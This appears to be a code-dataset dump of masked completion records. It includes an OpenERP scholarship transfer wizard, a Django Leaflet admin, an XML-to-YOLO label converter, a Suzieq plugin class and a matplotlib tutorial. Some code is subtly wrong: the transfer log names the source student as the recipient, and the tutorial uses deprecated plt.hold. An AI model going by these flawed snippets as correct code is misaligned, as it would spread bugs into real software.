valor = perfil_de.valor_bolsa\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {\n \"is_bolsista\": True, \"tipo_bolsa\": \"m\", \"valor_bolsa\": valor\n })\n perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n \"is_bolsista\": False, \"tipo_bolsa\": False, \"valor_bolsa\": False\n })\n transf.doc_discente_id_de.write({\"state\": \"n_bolsista\"})\n transf.doc_discente_id_para.write({\"state\": \"bolsista\", \"is_active\": True})\n get_banco(self, cr, transf, transf.doc_discente_id_para.discente_id.pessoa_id.id, context)\n evento = {\n \"responsavel_id\": responsavel[0],\n \"name\": u\"Transferência de bolsa\",\n \"envolvidos_ids\": [(4, transf.doc_discente_id_de.discente_id.pessoa_id.id),\n (4, transf.doc_discente_id_para.discente_id.pessoa_id.id)],\n \"descricao\": u\"Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula \"\n u\"%(matricula_de)s para o(a) discente \\\"%(discente_para)s\\\" sob matrícula\"\n u\"\\\"%(matricula_para)s\\\".\" % {\n \"valor\": valor, \"discente_de\": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n \"matricula_de\": perfil_de.matricula,\n \"discente_para\": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n \"matricula_para\": perfil_de.matricula\n }\n }\n transf.semestre_id.write({\"eventos_ids\": [(0, 0, evento)]})\n return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n _name = \"ud.monitoria.bolsa.remover.wizard\"\n _description = u\"Remoção de bolsa de discente\"\n\n _columns = {\n \"semestre_id\": fields.many2one(\"ud.monitoria.registro\", u\"Semestre\", required=True, readonly=True),\n \"curso_id\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('id', '=', False)]\"),\n \"tutor\": fields.boolean(u\"Tutor?\"),\n \"doc_discente_id\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), \"\n \"('is_active', '=', True), ('state', '=', 'bolsista')]\"),\n }\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid, fields_list, context)\n context = context or {}\n if context.get(\"active_id\", False):\n if context.get(\"active_model\", False) == \"ud.monitoria.registro\":\n res[\"semestre_id\"] = context.get(\"active_id\")\n elif context.get(\"active_model\", False) == \"ud.monitoria.documentos.discente\":\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, context.get(\"active_id\"), context)\n if doc.state != \"bolsista\":\n raise osv.except_osv(u\"Discente não bolsista\", u\"O discente não é bolsista\")\n elif not doc.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\",\n u\"Não é possível alterar o status de discentes inativos\")\n res[\"semestre_id\"] = doc.disciplina_id.semestre_id.id\n res[\"curso_id\"] = doc.disciplina_id.curso_id.id\n res[\"disciplina_id\"] = doc.disciplina_id.id\n res[\"tutor\"] = doc.tutor\n res[\"doc_discente_id\"] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {\"value\": {\"disciplina_id\": False}}\n reg = self.pool.get(\"ud.monitoria.registro\").read(cr, uid, semestre_id, [\"processos_seletivos_ids\"], context=context, load=\"_classic_write\")\n args = [(\"curso_id\", 
\"=\", curso_id), (\"processo_seletivo_id\", \"=\", reg[\"processos_seletivos_ids\"]), (\"is_active\", \"=\", True)]\n disc = self.pool.get(\"ud.monitoria.disciplina\").search(cr, uid, args, context=context)\n res = {\"domain\": {\"disciplina_id\": [(\"id\", \"in\", disc)]}}\n if not disc:\n res[\"value\"] = {\"disciplina_id\": False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False\n return {\n \"value\": {\"doc_discente_id\": doc_discente_id}\n }\n return {\"value\": {\"doc_discente_id\": False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get(\"ud.perfil\")\n pessoa_model = self.pool.get(\"ud.employee\")\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [(\"user_id\", \"=\", uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(\n u\"Registro Inexistente\",\n u\"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo\"\n )\n if len(responsavel) > 1:\n raise osv.except_osv(\n u\"Multiplos vínculos\",\n u\"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo\"\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {\n \"is_bolsista\": False, \"tipo_bolsa\": False, \"valor_bolsa\": False\n })\n rem.doc_discente_id.write({\"state\": \"n_bolsista\"})\n evento = {\n \"responsavel_id\": responsavel[0],\n \"name\": u\"Remoção de bolsa: \\\"%s\\\"\" % rem.doc_discente_id.discente_id.name,\n \"envolvidos_ids\": [(4, rem.doc_discente_id.discente_id.id)],\n \"descricao\": u\"A bolsa do discente \\\"%s\\\" sob matrícula \\\"%s\\\" foi removida.\" % (\n rem.doc_discente_id.discente_id.name.upper(), perfil.matricula\n )\n }\n rem.semestre_id.write({\"eventos_ids\": [(0, 0, evento)]})\n return True\n",
"step-ids": [
18,
20,
22,
24,
26
]
}
|
[
18,
20,
22,
24,
26
] |
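For context, the onchange_* methods in the wizard record above all follow the classic OpenERP 7 convention of returning a dict of form updates that the web client applies. A minimal sketch of that contract, using field names taken from the wizards above:

# Sketch of the OpenERP 7 onchange return contract (illustrative only).
def onchange_example(self, cr, uid, ids, banco_id, context=None):
    if not banco_id:
        # Clear dependent fields and lock down their selection domain.
        return {'value': {'agencia': False, 'conta': False},
                'domain': {'dados_bancarios_id': [('id', '=', False)]}}
    return {'value': {}}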
from django.contrib import admin
from .models import Spot
from leaflet.admin import LeafletGeoAdmin
class SpotAdmin(LeafletGeoAdmin):
pass
admin.site.register(Spot, SpotAdmin)
|
normal
|
{
"blob_id": "7633944366c6655306bc41087b19a474e9c414b5",
"index": 7688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass SpotAdmin(LeafletGeoAdmin):\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SpotAdmin(LeafletGeoAdmin):\n pass\n\n\nadmin.site.register(Spot, SpotAdmin)\n",
"step-4": "from django.contrib import admin\nfrom .models import Spot\nfrom leaflet.admin import LeafletGeoAdmin\n\n\nclass SpotAdmin(LeafletGeoAdmin):\n pass\n\n\nadmin.site.register(Spot, SpotAdmin)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
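The admin registration in the record above can equivalently be written with Django's @admin.register decorator (available since Django 1.7); a small sketch assuming the same Spot model and django-leaflet install:

from django.contrib import admin
from leaflet.admin import LeafletGeoAdmin
from .models import Spot

# Equivalent to admin.site.register(Spot, SpotAdmin).
@admin.register(Spot)
class SpotAdmin(LeafletGeoAdmin):
    pass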
<|reserved_special_token_0|>
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
<|reserved_special_token_0|>
ap.add_argument('-p', '--path', required=True, help='annotations path')
ap.add_argument('-o', '--output', required=True, help='txt output path')
<|reserved_special_token_0|>
print()
print()
print()
print(
'=========================================================================='
)
print(
' ATENTION '
)
print()
print(
' ATENTION '
)
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print(
'=========================================================================='
)
print()
print()
print()
run(args['path'], args['output'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
ap = argparse.ArgumentParser()
ap.add_argument('-p', '--path', required=True, help='annotations path')
ap.add_argument('-o', '--output', required=True, help='txt output path')
args = vars(ap.parse_args())
print()
print()
print()
print(
'=========================================================================='
)
print(
' ATENTION '
)
print()
print(
' ATENTION '
)
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print(
'=========================================================================='
)
print()
print()
print()
run(args['path'], args['output'])
<|reserved_special_token_1|>
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
import argparse
import numpy as np
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
ap = argparse.ArgumentParser()
ap.add_argument('-p', '--path', required=True, help='annotations path')
ap.add_argument('-o', '--output', required=True, help='txt output path')
args = vars(ap.parse_args())
print()
print()
print()
print(
'=========================================================================='
)
print(
' ATENTION '
)
print()
print(
' ATENTION '
)
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print(
'=========================================================================='
)
print()
print()
print()
run(args['path'], args['output'])
<|reserved_special_token_1|>
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
import argparse
import numpy as np
def run(path, output):
#xml_df = xml_to_csv(path)
#xml_df.to_csv(output, index=None)
# for filename in os.listdir(path):
# base_file, ext = os.path.splitext(filename)
# print(base_file, ext)
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file+".txt")
l = []
for member in root.findall('object'):
#================ CLASS NAMES =======================
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
#class_number x1 y1 width height image_width image_height
l.append([iclass,
int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text),
int(member.find('bndbox').find('xmax').text)-int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymax').text)-int(member.find('bndbox').find('ymin').text),
int(root.find('size')[0].text),
int(root.find('size')[1].text) ])
np.savetxt(txtFileName, np.asarray(l),fmt='%d', delimiter =' ',newline='\n')
print('Successfully converted xml to txt.')
#=============================================================================
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path", required=True, help="annotations path")
ap.add_argument("-o", "--output", required=True, help="txt output path")
args = vars(ap.parse_args())
print()
print()
print()
print('==========================================================================')
print(' ATENTION ')
print()
print(' ATENTION ')
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print('==========================================================================')
print()
print()
print()
run(args["path"], args["output"])
|
flexible
|
{
"blob_id": "26d14bc74d893f6f14ee7405280f4af41854c544",
"index": 141,
"step-1": "<mask token>\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\n<mask token>\nap.add_argument('-p', '--path', required=True, help='annotations path')\nap.add_argument('-o', '--output', required=True, help='txt output path')\n<mask token>\nprint()\nprint()\nprint()\nprint(\n '=========================================================================='\n )\nprint(\n ' ATENTION '\n )\nprint()\nprint(\n ' ATENTION '\n )\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint(\n '=========================================================================='\n )\nprint()\nprint()\nprint()\nrun(args['path'], args['output'])\n",
"step-3": "<mask token>\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\nap = argparse.ArgumentParser()\nap.add_argument('-p', '--path', required=True, help='annotations path')\nap.add_argument('-o', '--output', required=True, help='txt output path')\nargs = vars(ap.parse_args())\nprint()\nprint()\nprint()\nprint(\n '=========================================================================='\n )\nprint(\n ' ATENTION '\n )\nprint()\nprint(\n ' ATENTION '\n )\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint(\n '=========================================================================='\n )\nprint()\nprint()\nprint()\nrun(args['path'], args['output'])\n",
"step-4": "import os\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nimport argparse\nimport numpy as np\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\nap = argparse.ArgumentParser()\nap.add_argument('-p', '--path', required=True, help='annotations path')\nap.add_argument('-o', '--output', required=True, help='txt output path')\nargs = vars(ap.parse_args())\nprint()\nprint()\nprint()\nprint(\n '=========================================================================='\n )\nprint(\n ' ATENTION '\n )\nprint()\nprint(\n ' ATENTION '\n )\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint(\n '=========================================================================='\n )\nprint()\nprint()\nprint()\nrun(args['path'], args['output'])\n",
"step-5": "import os\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nimport argparse\nimport numpy as np\n\ndef run(path, output):\n #xml_df = xml_to_csv(path)\n #xml_df.to_csv(output, index=None)\n\n # for filename in os.listdir(path):\n # base_file, ext = os.path.splitext(filename)\n # print(base_file, ext)\n\n for xml_file in glob.glob(path + '/*.xml'):\n\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file+\".txt\")\n\n l = []\n for member in root.findall('object'):\n\n #================ CLASS NAMES =======================\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n \n #class_number x1 y1 width height image_width image_height\n l.append([iclass, \n int(member.find('bndbox').find('xmin').text), \n int(member.find('bndbox').find('ymin').text), \n int(member.find('bndbox').find('xmax').text)-int(member.find('bndbox').find('xmin').text), \n int(member.find('bndbox').find('ymax').text)-int(member.find('bndbox').find('ymin').text), \n int(root.find('size')[0].text), \n int(root.find('size')[1].text) ])\n\n np.savetxt(txtFileName, np.asarray(l),fmt='%d', delimiter =' ',newline='\\n') \n\n print('Successfully converted xml to txt.')\n\n#=============================================================================\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--path\", required=True, help=\"annotations path\")\nap.add_argument(\"-o\", \"--output\", required=True, help=\"txt output path\")\n\nargs = vars(ap.parse_args())\n\n\nprint()\nprint()\nprint()\nprint('==========================================================================')\nprint(' ATENTION ')\nprint()\nprint(' ATENTION ')\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint('==========================================================================')\nprint()\nprint()\nprint()\n\nrun(args[\"path\"], args[\"output\"])\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
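The converter in the record above writes one <image>.txt per Pascal-VOC XML file. A minimal sketch of calling it directly instead of via argparse (the paths are placeholders):

# Direct invocation of the converter defined above; paths are placeholders.
run(path="./annotations", output="./labels")
# Each line of the resulting .txt files has the form:
# class_id x1 y1 width height image_width image_height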
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InventoryAsyncPlugin(SqPlugin):
<|reserved_special_token_0|>
async def run(self):
"""Background task to launch in order to execute the plugin"""
try:
await self._execute()
finally:
await self._stop()
@abstractmethod
async def _execute(self):
"""Launch the backuground task
"""
async def _stop(self):
"""Actions to execute before terminating the task
"""
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InventoryAsyncPlugin(SqPlugin):
"""Plugins which inherit this class will have methods 'run'
Once the controller check that the object inherit this class, it launches
a new task executing the run method.
"""
async def run(self):
"""Background task to launch in order to execute the plugin"""
try:
await self._execute()
finally:
await self._stop()
@abstractmethod
async def _execute(self):
"""Launch the backuground task
"""
async def _stop(self):
"""Actions to execute before terminating the task
"""
return
<|reserved_special_token_1|>
from abc import abstractmethod
from suzieq.shared.sq_plugin import SqPlugin
class InventoryAsyncPlugin(SqPlugin):
"""Plugins which inherit this class will have methods 'run'
Once the controller check that the object inherit this class, it launches
a new task executing the run method.
"""
async def run(self):
"""Background task to launch in order to execute the plugin"""
try:
await self._execute()
finally:
await self._stop()
@abstractmethod
async def _execute(self):
"""Launch the backuground task
"""
async def _stop(self):
"""Actions to execute before terminating the task
"""
return
|
flexible
|
{
"blob_id": "8b49aa63cc6e4490b7b22cd304dbba132962c870",
"index": 9049,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n <mask token>\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n",
"step-3": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n",
"step-4": "from abc import abstractmethod\nfrom suzieq.shared.sq_plugin import SqPlugin\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
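A minimal concrete subclass of the InventoryAsyncPlugin shown above, sketching how the controller described in its docstring might schedule it; the polling logic is an assumption for illustration, not taken from Suzieq:

import asyncio

class PollingInventory(InventoryAsyncPlugin):
    async def _execute(self):
        # Hypothetical periodic work; a real plugin would refresh inventory here.
        while True:
            await asyncio.sleep(60)

    async def _stop(self):
        print("plugin shutting down")

# Controller side, per the docstring: launch run() as a background task.
# task = asyncio.create_task(PollingInventory().run())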
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def test_number():
pass
|
flexible
|
{
"blob_id": "687ab41e9ce94c8d14154a941504845a8fa9f2d9",
"index": 8660,
"step-1": "<mask token>\n",
"step-2": "def test_number():\n pass\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
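The placeholder in the record above is collected by pytest because its name starts with test_; a non-empty variant would simply assert something:

def test_number():
    # A trivial assertion so the test actually checks something.
    assert 1 + 1 == 2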
import numpy as np
import matplotlib.pyplot as plt
##########################################
# line plot
#########################################
# If the x axis is omitted, it defaults to 0, 1, 2, 3
"""
plt.plot([1, 4, 9, 16])
plt.show()
"""
# Specifying both the x and y axes
"""
plt.plot([10, 20, 30, 40], [1, 4, 9, 16])
plt.show()
"""
# Style specification
# Specified in the order: color, marker, line style
# Colors : blue(b), green(g), red(r), cyan(c), magenta(m), yellow(y), black(k), white(w)
# Markers : point(.), pixel(,), circle(o), triangle_down(v), triangle_up(^),
#        triangle_left(<), triangle_right(>), tri_down(1), tri_up(2), tri_left(3),
#        tri_right(4), square(s), pentagon(p), star(*), hexagon1(h),
#        hexagon2(H), plus(+), x marker(x), diamond(D), thin_diamond(d)
# Line styles : solid line(-), dashed line(--), dash-dot line(-.), dotted(:)
"""
plt.plot([1,4,9,16], 'bs:')
plt.show()
"""
# Other style options
# See http://matplotlib.org/1.5.1/api/lines_api.html#matplotlib.lines.Line2D
# color(c) : line color
# linewidth(lw) : line width
# linestyle(ls) : line style
# marker : marker type
# markersize(ms) : marker size
# markeredgecolor(mec) : marker edge color
# markeredgewidth(mew) : marker edge width
# markerfacecolor(mfc) : marker face (fill) color
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.show()
"""
# Setting the plot range
# Specify the minimum and maximum values with xlim and ylim
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.xlim(-10, 10)
plt.ylim(-10, 30)
plt.show()
"""
# Tick settings
# Tick : a position marker along an axis of a plot or chart
# Tick label : the number or text written at a tick
# Tick labels are set with xticks and yticks
# A tick label string may contain a LaTeX math expression between $ signs
"""
X = np.linspace(-np.pi, np.pi, 256)
C = np.cos(X)
plt.plot(X, C)
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi])
plt.yticks([-1, 0, +1])
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\pi$', r'$-\pi/2$',
'0', r'$+\pi/2$', r'$+\pi$'])
plt.yticks([-1, 0, +1], ["Low", "Zero", "High"])
plt.grid(False) # turn the grid off
plt.show()
"""
# Drawing multiple lines
# Simply pass several x, y, style groups
"""
t = np.arange(0., 5., 0.2)
plt.plot(t, t, 'r--', t, 0.5*t**2, 'bs:', t, 0.2*t**3, 'g^-')
plt.show()
"""
# Applying multiple plot commands to a single figure : hold
# hold(True) : start overlaying
# hold(False) : stop overlaying
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.hold(True)
plt.plot([9,16,4,1], c="k", lw=3, ls=":", marker="s", ms=10, mec="m", mew=5,
mfc="c")
plt.hold(False)
plt.show()
"""
# Legend
# Add a legend with the legend command
# The loc argument sets the legend position
# loc : best(0), upper right(1), upper left(2), lower left(3),
#       lower right(4), right(5), center left(6), center right(7),
#       lower center(8), upper center(9), center(10)
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
